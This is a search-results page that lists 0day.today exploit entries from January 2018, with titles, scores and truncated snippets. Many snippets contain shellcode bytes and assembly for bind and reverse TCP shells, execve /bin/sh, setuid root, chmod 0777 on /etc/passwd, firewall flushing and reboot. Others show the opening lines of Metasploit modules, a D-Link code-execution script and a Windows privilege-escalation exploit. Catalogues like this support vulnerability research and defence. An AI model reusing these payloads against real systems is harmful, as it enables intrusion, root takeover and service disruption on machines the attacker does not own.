Lucene search
K

39001 matches found

0day.today
0day.today
added 2018/01/15 12:0 a.m.70 views

Adminer v4.3.1 Server Side Request Forgery Exploit

Exploit for multiple platform in category web applications + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: apparition security Vendor: ==============...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/14 12:0 a.m.58 views

Zimbra Collaboration Suite Cross Site Scripting Vulnerability

Exploit for php platform in category web applications COMPASS SECURITY ADVISORY https://www.compass-security.com CVE ID : CVE-2017-8802 Product: Zimbra Collaboration Suite ZCS 1 Vendor: Synacor Inc. 2 Subject: Stored Cross-Site Scripting XSS Vulnerability Risk: High Effect: Exploitable by Anonymo...

3.5CVSS5.9AI score0.01264EPSS
Exploits2
0day.today
0day.today
added 2018/01/14 12:0 a.m.76 views

Magento Commerce Server-Side Request Forgery Vulnerability

Exploit for php platform in category web applications Document Title: =============== Magento Commerce - SSRF & XSPA Web Vulnerability Vulnerability Class: ==================== Server Side Request Forgery Product & Service Introduction: =============================== Magento is an open source...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/14 12:0 a.m.140 views

Magento Connect T1 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Document Title: =============== Magento Connect T1 - Claim Persistent Vulnerability Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000a! - 2.000a! Product & Servi...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/14 12:0 a.m.25 views

Piwigo 2.8.2 / 2.9.2 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Document Title: =============== Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500a! - 1.000a!...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/13 12:0 a.m.112 views

Flash Operator Panel 2.31.03 Command Execution Vulnerability

Exploit for php platform in category web applications Document Title: =============== Flash Operator Panel v2.31.03 - Command Execution Vulnerability Product & Service Introduction: =============================== The most comprehensive and affordable reporting and realtime monitor package for...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/13 12:0 a.m.44 views

ZyXEL P-660HW UDP Denial Of Service Exploit

Exploit for hardware platform in category dos / poc Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service CVE: CVE-2018-5330 CWE: CWE-400 Exploit Author: Hosein Askari Vendor HomePage: https://www.zyxel.com/ Version : v3 Tested on: ZyXEL P-660HW Category: Network Appliance Author Mail ...

7.8CVSS7.6AI score0.01749EPSS
Exploits3
0day.today
0day.today
added 2018/01/12 12:0 a.m.29 views

Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)

/ 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 / "\x01\x30\x87\xe2" / add r3, r7, 1 / "\x13\x07\xa0\xe1" / mov r0, r3, lsl r7 / "\x01\x20\x83\xe2" / add r...

0.3AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.59 views

Kentico CMS 11.0 - Buffer Overflow Vulnerability

Exploit for windows platform in category dos / poc Document Title: =============== Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability CVE-ID: ======= CVE-2018-5282 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 2.000€ - 3.000€...

7.2CVSS7.6AI score0.01549EPSS
Exploits5
0day.today
0day.today
added 2018/01/12 12:0 a.m.28 views

IRIX - execve (/bin/sh -c) Shellcode (72 bytes)

char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.17 views

Linux/StrongARM - setuid() Shellcode (20 bytes)

/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.17 views

IRIX - execve (/bin/sh) Shellcode (68 bytes)

/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.22 views

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.64 views

macOS - process_policy Stack Leak Through Uninitialized Field Exploit

Exploit for macOS platform in category dos / poc / The syscall processpolicyscope=PROCPOLICYSCOPEPROCESS, action=PROCPOLICYACTIONGET, policy=PROCPOLICYRESOURCEUSAGE, policysubtype=PROCPOLICYRUSAGECPU, attrp=, targetpid=0, targetthreadid= causes 4 bytes of uninitialized kernel stack memory to be...

5.6CVSS7AI score0.01134EPSS
Exploits4
0day.today
0day.today
added 2018/01/12 12:0 a.m.24 views

Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)

/ Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta 0x10 / / execve of /bin/sh / "\x2d\x0b\xd8\x9a" / sethi...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.17 views

Linux/SPARC - setreuid(0,0) + standard execve() Shellcode (72 bytes)

/ Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.39 views

PyroBatchFTP < 3.19 - Buffer Overflow Exploit

Exploit for windows platform in category dos / poc ============================================= MGC ALERT 2018-001 - Original release date: December 22, 2017 - Last revised: January 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 CVSS Base Score...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.26 views

Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)

/ ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa @OsandaMalith global start section .text start: ;open xor rax, rax add rax, 2 ; open syscall xor rdi, rdi xor rsi, rsi push...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.12 views

Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)

/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.18 views

Linux/x86-64 - execve (/sbin/iptables, [/sbin/iptables, -F], NULL) Shellcode (43 bytes)

/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve"/sbin/iptables", "/sbin/iptables", "-F",...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.31 views

Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)

/ global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push rbx push rsp pop rdi xor rsi,rsi mov sil,4 sal rsi,8 mov sil,1 syscall ;write push rax pop rdi push 1 pop rax jmp data...

Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.18 views

Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)

/ Title: Add map in /etc/hosts file - 79 bytes Date: 2015-03-02 Architecture: armv6l GNU/Linux Website: http://osandamalith.wordpress.com E-Mail: osandacatunseen.is Author: Osanda Malith Jayathissa @OsandaMalith hosts: file format elf32-littlearm Disassembly of section .text: 00008054 : 8054:...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.279 views

Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)

/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; // cha...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.19 views

IRIX - stdin-read Shellcode (40 bytes)

/ 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t7, -29 / 0x01e07827, / nor $t7, $t7, $zero / 0x03ef2821, / addu $a1, $ra,...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.16 views

Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)

/ Bind /bin/sh on port 31337 SH4 - 132bytes main: mov 102,r3 mov 2,r4 mov 1,r5 xor r6,r6 mov.l r6,@-r15 mov.l r5,@-r15 mov.l r4,@-r15 mov 1,r4 mov r15,r5 trapa 19 mov r0,r4 mov r0,r8 xor r2,r2 mov.l r2,@-r15 mov 105,r2 mov.b r2,@-r15 mov 122,r2 mov.b r2,@-r15 xor r2,r2 mov.b r2,@-r15 mov 2,r2 mov...

0.3AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.20 views

Linux/ARM - execve (/bin/sh, [], [0 vars]) Shellcode (35 bytes)

/ Title : Linux/ARM - execve"/bin/sh", , 0 vars - 35 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.20 views

Linux/ARM - creat(/root/pwned, 0777) Shellcode (39 bytes)

/ Title : Linux/ARM - creat"/root/pwned", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.50 views

Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)

/ This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null bytes in the code, but does this really matter these days? it could be fixed with just a few instructions. Released to th...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.30 views

Taxi Booking Script 1.0 - Cross-site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Taxi Booking Script v1.0 - Cross-site Scripting XSS Vendor Homepage: https://www.phpjabbers.com/taxi-booking-script/ Software Link: Demo:...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.36 views

Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)

/ Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov rbx, 0xdeadbeefcafe1dea ;mov rcx, 0xdeadbeefcafe1dea ;mov rdx, 0xdeadbeefcafe1dea xor eax, ea...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.26 views

Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)

/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.35 views

Xnami 1.0 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Xnami Image Sharing - Persistent XSS Vulnerability Google Dork: " Copyright 2017 xnami. " & 2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: bizlogicdev.com Version: 1.0 CVE-ID...

4.3CVSS0.1AI score0.02186EPSS
Exploits5
0day.today
0day.today
added 2018/01/12 12:0 a.m.17 views

IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)

/ 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso / unsigned long int shellcode = 0x2416fffd, / li $s6, -3 / 0x02c07027, / nor $t6, $s6, $zero / 0x01ce2025, / or $a0, $t6, $t6 / 0x01ce2825, / or $a1, $t6, $t6 / 0x240efff9, / li $t6, -7 / 0x01c03027, / nor $a2, $t6, $zero /...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.58 views

ALLMediaServer 0.95 - Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95 Exploit Author: Mario Kartone Ciccarelli Contact: https://twitter.com/Kartone CVE: CVE-2017-17932 Thanks to PoC: https://www.exploit-db.com/exploits/43406/ Softwar...

10CVSS9.2AI score0.53597EPSS
Exploits10
0day.today
0day.today
added 2018/01/12 12:0 a.m.26 views

Linux/SuperH (sh4) - execve(/bin/sh, 0, 0) Shellcode (19 bytes)

/ | Title: Linux/SuperH - sh4 execve"/bin/sh", 0, 0 - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org / include include int main char shell = "\x0b\xe3"// mov 11,r3 "\x02\xc7"// mova @10,pc,r0...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/12 12:0 a.m.20 views

Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)

/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.21 views

FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

/ -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : email protected / include include char shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x54\x53\xb0\x3b\x50\xcd\x80"; int...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.115 views

Parity Browser < 1.6.10 - Bypass Same Origin Policy Vulnerability

Exploit for multiple platform in category local exploits VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016 Version: 0.3 Date: Jun 16th, 2017 Tag: parity same origin policy bypass webproxy token reuse Overview -------- Name: parity Vendor: paritytech...

5CVSS5.3AI score0.05479EPSS
Exploits4
0day.today
0day.today
added 2018/01/11 12:0 a.m.20 views

LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow Exploit

Exploit for windows platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow', 'Description' = %q This module exploi...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.131 views

FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)

/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.53 views

Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Exploit

Exploit for Android platform in category dos / poc This bug is similar to Jann Horn's issue https://bugs.chromium.org/p/project-zero/issues/detail?id=851 -- credit should go to him. The hardware service manager allows the registration of HAL services. These services are used by the vendor domain...

7.2CVSS0.1AI score0.00753EPSS
Exploits2
0day.today
0day.today
added 2018/01/11 12:0 a.m.64 views

D-Link Routers 110/412/615/815 < 1.03 - service.cgi Arbitrary Code Execution Exploit

Exploit for hardware platform in category web applications !/usr/bin/python Exploit Title: D-Link WAP 615/645/815 .?.?', 'Product Page : .?' def dlinkdetection: try: r = requests.getURL, timeout=10.00 except requests.exceptions.ConnectionError: print "Error: Failed to connect to " + URL return...

0.3AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.29 views

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.46 views

Jungo Windriver 12.5.1 - Privilege Escalation Exploit

Exploit for windows platform in category local exploits // ConsoleApplication1.cpp : Defines the entry point for the console application. // include "stdafx.h" include include define device L"\\.\WINDRVR1251" define SPRAYSIZE 30000 typedef NTSTATUSWINAPI PNtAllocateVirtualMemory HANDLE...

7.2CVSS7.7AI score0.01204EPSS
Exploits3
0day.today
0day.today
added 2018/01/11 12:0 a.m.89 views

phpCollab 2.5.1 - Unauthenticated File Upload Exploit

Exploit for php platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'phpCollab 2.5.1 Unauthenticated File Upload', 'Description' = %q This module exploits a file...

6.5CVSS8.6AI score0.96068EPSS
Exploits9
0day.today
0day.today
added 2018/01/11 12:0 a.m.20 views

FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)

/ Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" "\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80" "\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" "\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e"...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.696 views

MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Vulnerability

Exploit for multiple platform in category dos / poc VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-8798 Version: 0.6 Date: May 1st, 2017 Tag: miniupnpc getHTTPResponse chunked encoding integer signedness error Overview -------- Name: miniupnpc Vendor: Thomas...

7.5CVSS0.3AI score0.24027EPSS
Exploits6
0day.today
0day.today
added 2018/01/11 12:0 a.m.22 views

FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)

/ Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes' Type: Shellcode Author: antrhacks Platform: FreeBSD 8.0-RELEASE / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2d 46 61 6c push $0x6c61462d 89 e1 mov %esp,%ecx 50 push %eax 68 66 63 74 6c push $0x6c746366 68 69 6e 2f 70...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.16 views

FreeBSD/x86 - reboot() Shellcode (15 Bytes)

/ FreeBSD reboot shellcode This will halt a system, which takes it offline until someone reboots it. Written by zillion at safemode.org / char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret; ret = int &ret + 2; ret = intshellcode;...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/11 12:0 a.m.18 views

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

0.1AI score
Exploits0
Total number of security vulnerabilities39001